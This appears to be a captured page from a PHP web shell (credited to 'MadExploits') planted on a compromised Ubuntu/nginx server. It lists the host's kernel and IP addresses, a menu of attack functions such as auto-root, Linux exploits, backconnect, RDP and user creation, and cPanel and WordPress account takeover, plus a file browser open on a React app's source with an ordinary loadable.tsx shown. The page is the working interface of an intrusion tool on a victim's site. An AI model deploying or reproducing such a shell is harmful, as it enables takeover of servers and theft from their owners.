Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-core-ui-code /
app /
utils /
[ HOME SHELL ]
Name
Size
Permission
Action
history.ts
112
B
-rwxrwxr-x
loadable.tsx
489
B
-rwxrwxr-x
redux-injectors.tsx
463
B
-rwxrwxr-x
request.ts
1.42
KB
-rwxrwxr-x
role-check.tsx
240
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : loadable.tsx
import * as React from 'react'; interface Props { fallback?: React.ReactNode | null; } const loadable = <T extends React.ComponentType<any>>( importFunc: () => Promise<{ default: T }>, { fallback = null }: Props = { fallback: null }, ) => { const LazyComponent = React.lazy(importFunc); return (props: React.ComponentProps<T>): JSX.Element => ( <React.Suspense fallback={fallback}> <LazyComponent {...props} /> </React.Suspense> ); }; export default loadable;
Close